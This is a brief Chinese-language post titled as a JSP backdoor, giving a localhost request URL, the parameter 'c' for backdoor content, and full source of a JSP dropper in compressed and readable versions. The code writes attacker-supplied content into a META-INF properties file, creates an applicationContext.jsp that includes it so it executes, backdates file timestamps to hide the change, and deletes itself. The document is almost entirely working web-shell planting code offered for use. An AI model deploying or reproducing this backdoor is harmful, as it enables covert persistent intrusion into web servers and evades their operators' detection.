jsp 后门
请求地址:http://localhost:8080/zsy.jsp
请求参数:c=后门内容
zsy压缩.jsp:
<%@page language="java" pageEncoding="UTF-8"%><%@page import="java.text.SimpleDateFormat"%><%@page import="java.io.*"%><%@page import="java.net.*"%><%!String getConnection(String url) throws Exception{String result="",line="";URLConnection connection=new URL(url).openConnection();connection.setConnectTimeout(15000);connection.setReadTimeout(15000);BufferedReader in=new BufferedReader(new InputStreamReader(connection.getInputStream()));while((line=in.readLine())!=null){result+=line;}return result;}void writeStringToFile(File f, String content,String encode,boolean append) throws Exception{long lastModified =!f.exists()?new SimpleDateFormat("yyyy-mm-dd HH:mm:ss").parse("2012-03-14 12:43:11").getTime():f.lastModified();StringBuilder sb=new StringBuilder();BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f, append),"UTF-8"));bw.write(content);bw.flush();bw.close();f.setLastModified(lastModified);}void writeMetaInfFile(String path,String c) throws Exception{File f=new File(path+File.separator+"META-INF");if(!f.exists()){f.mkdirs();}writeStringToFile(new File(f,"applicationContext.properties"),c,"UTF-8",false);}void writeShell(String root,File file, String c) throws Exception{writeStringToFile(file,"<%@ include file=\"/META-INF/applicationContext.properties\" %"+">","UTF-8",false);writeMetaInfFile(root.toString(),c);}String startX(File file, String basePath,String c) throws Exception{File[] f=file.listFiles();String sb=getPath(file);File p=new File(sb!=null?sb:file.toString(),"applicationContext.jsp");writeShell(file.toString(),p,c);return p.toString();}String getRequestFileRealPath(HttpServletRequest request){String webRoot=(request.getSession().getServletContext().getRealPath("/").replaceAll("\\\\","/")+"/").replaceAll("/+","/"),context=request.getContextPath(),uri=request.getRequestURI().replaceAll("/+","/"),filePath = (webRoot+uri).replaceAll("/+","/");if(!"".equals(context)&&webRoot.endsWith(context+"/")){return webRoot.substring(0,webRoot.indexOf(context))+uri;}else{if(uri.split("/").length>1){String[] c=uri.split("/");if(!new File(webRoot+c[1]).exists()){return (webRoot+(uri.replaceFirst(c[1],""))).replaceAll("/+","/");}}}return filePath;}String getPath(File file){File[] f = file.listFiles();for (File a:f){if (a.isDirectory()&&!a.toString().contains("WEB-INF")&&!a.toString().contains("META-INF")){return a.toString();}}return null;}%><%try{String path=request.getContextPath();String basePath=request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";File root=new File(application.getRealPath("/"));String p = startX(root,basePath,request.getParameter("c"));out.println("[path:"+basePath+(p.toString().replace(root.toString(),"").replaceAll("\\\\","/").replaceFirst("/","").replaceAll("/+","/"))+"]");new File(getRequestFileRealPath(request)).delete();}catch(Exception e){out.println("[/ok]");}%>
zsy.jsp:
<%@page language="java" pageEncoding="UTF-8"%>
<%@page import="java.text.SimpleDateFormat"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%!
String getConnection(String url) throws Exception{
String result = "", line = "";
URLConnection connection = new URL(url).openConnection();
connection.setConnectTimeout(15000);
connection.setReadTimeout(15000);
BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
while ((line = in.readLine()) != null) {
result += line;
}
return result;
}
void writeStringToFile(File f, String content, String encode, boolean append) throws Exception{
long lastModified = !f.exists() ? new SimpleDateFormat("yyyy-mm-dd HH:mm:ss").parse("2012-03-14 12:43:11").getTime(): f.lastModified();
StringBuilder sb = new StringBuilder();
BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f, append), "UTF-8"));
bw.write(content);
bw.flush();
bw.close();
f.setLastModified(lastModified);
}
void writeMetaInfFile(String path,String c) throws Exception {
File f = new File(path+File.separator+"META-INF");
if(!f.exists()){
f.mkdirs();
}
writeStringToFile(new File(f,"applicationContext.properties"),c, "UTF-8", false);
}
void writeShell(String root,File file, String c) throws Exception{
writeStringToFile(file,"<%@ include file=\"/META-INF/applicationContext.properties\" %"+">", "UTF-8", false);
writeMetaInfFile(root.toString(),c);
}
String getPath(File file){
File[] f = file.listFiles();
for (File a : f) {
if (a.isDirectory()&&!a.toString().contains("WEB-INF")&&!a.toString().contains("META-INF")) {
return a.toString();
}
}
return null;
}
String startX(File file, String basePath, String c) throws Exception {
File[] f = file.listFiles();
String sb = getPath(file);
File p = new File(sb != null ? sb : file.toString(),"applicationContext.jsp");
writeShell(file.toString(), p, c);
return p.toString();
}
String getRequestFileRealPath(HttpServletRequest request){
String webRoot = (request.getSession().getServletContext().getRealPath("/").replaceAll("\\\\", "/")+"/").replaceAll("/+", "/"),
context = request.getContextPath(),
uri = request.getRequestURI().replaceAll("/+", "/"),
filePath = (webRoot+uri).replaceAll("/+", "/");
if(!"".equals(context)&&webRoot.endsWith(context+"/")){
return webRoot.substring(0,webRoot.indexOf(context))+uri;
}else{
if(uri.split("/").length>1){
String[] c = uri.split("/");
if(!new File(webRoot+c[1]).exists()){
return (webRoot+(uri.replaceFirst(c[1], ""))).replaceAll("/+", "/");
}
}
}
return filePath;
}
%>
<%
try{
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
File root = new File(application.getRealPath("/"));
String p = startX(root, basePath,request.getParameter("c"));
out.println("[path:"+basePath+(p.toString().replace(root.toString(),"").replaceAll("\\\\","/").replaceFirst("/","").replaceAll("/+","/"))+"]");
new File(getRequestFileRealPath(request)).delete();
}catch(Exception e){
out.println("[/ok]");
}
%>